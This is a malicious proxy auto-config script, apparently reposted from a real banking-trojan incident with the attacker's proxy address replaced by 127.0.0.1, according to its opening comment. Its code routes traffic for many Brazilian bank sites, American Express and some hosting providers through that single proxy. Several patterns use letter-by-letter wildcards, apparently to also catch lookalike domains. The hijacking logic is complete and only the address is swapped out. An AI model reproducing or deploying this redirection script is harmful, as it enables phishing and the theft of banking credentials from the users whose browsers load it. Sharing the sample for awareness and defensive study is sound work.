function FindProxyForURL(url, host) { // NOTE: Other then these lines of comment the only thing that // I have changed is the IP address on the next line to protect // the ISP. Because they were in rural Minnesota rather than // in some large metropolitian arey they moved quickly to avert // the damage. THANK YOU! var proxy_yes = "PROXY 127.0.0.1:80"; var proxy_no = "DIRECT"; if (shExpMatch(url, "http://www.bradesco.com.br*")) { return proxy_yes; } if (shExpMatch(url, "http://bradesco.com.br*")) { return proxy_yes; } if (shExpMatch(url, "http://www.itau.com.br*")) { return proxy_yes; } if (shExpMatch(url, "http://itau.com.br*")) { return proxy_yes; } if (shExpMatch(url, "http://www.real.com.br*")) { return proxy_yes; } if (shExpMatch(url, "http://real.com.br*")) { return proxy_yes; } if (shExpMatch(url, "http://www.bancoreal.com.br*")) { return proxy_yes; } if (shExpMatch(url, "http://bancoreal.com.br*")) { return proxy_yes; } if (shExpMatch(url, "http://www.b*a*n*c*o*d*o*b*r*a*s*i*l*.com.br*")) { return proxy_yes; } if (shExpMatch(url, "http://b*a*n*c*o*d*o*b*r*a*s*i*l*.com.br*")) { return proxy_yes; } if (shExpMatch(url, "http://b*b*.*c*o*m*.*b*r*")) { return proxy_yes; } if (shExpMatch(url, "http://w*w*w*.*b*b*.*c*o*m*.*b*r*")) { return proxy_yes; } if (shExpMatch(url, "http://w*w*w*.*s*i*c*r*e*d*i*.*c*o*m*.*b*r*")) { return proxy_yes; } if (shExpMatch(url, "http://*s*i*c*r*e*d*i*.*c*o*m*.*b*r*")) { return proxy_yes; } if (shExpMatch(url, "http://santander.com.br*")) { return proxy_yes; } if (shExpMatch(url, "http://www.santander.com.br*")) { return proxy_yes; } if (shExpMatch(url, "http://americanexpress.com*")) { return proxy_yes; } if (shExpMatch(url, "http://www.americanexpress.com*")) { return proxy_yes; } if (shExpMatch(url, "http://www.itaupersonnalite.com.br*")) { return proxy_yes; } if (shExpMatch(url, "http://itaupersonnalite.com.br*")) { return proxy_yes; } if (shExpMatch(url, "http://santanderempresarial.com.br*")) { return proxy_yes; } if (shExpMatch(url, "http://www.santanderempresarial.com.br*")) { return proxy_yes; } if (shExpMatch(url, "http://hsbc.com.br*")) { return proxy_yes; } if (shExpMatch(url, "http://www.hsbc.com.br*")) { return proxy_yes; } if (shExpMatch(url, "http://www.uolhost.com.br*")) { return proxy_yes; } if (shExpMatch(url, "http://uolhost.com.br*")) { return proxy_yes; } if (shExpMatch(url, "http://santanderempresarial.com.br*")) { return proxy_yes; } if (shExpMatch(url, "http://www.santanderempresarial.com.br*")) { return proxy_yes; } if (shExpMatch(url, "http://locaweb.com.br*")) { return proxy_yes; } if (shExpMatch(url, "http://www.locaweb.com.br*")) { return proxy_yes; } if (shExpMatch(url, "http://caixa.gov.br*")) { return proxy_yes; } if (shExpMatch(url, "http://www.caixa.gov.br*")) { return proxy_yes; } if (shExpMatch(url, "http://bancoamazonia.com.br*")) { return proxy_yes; } if (shExpMatch(url, "http://www.bancoamazonia.com.br*")) { return proxy_yes; } else return "DIRECT"; }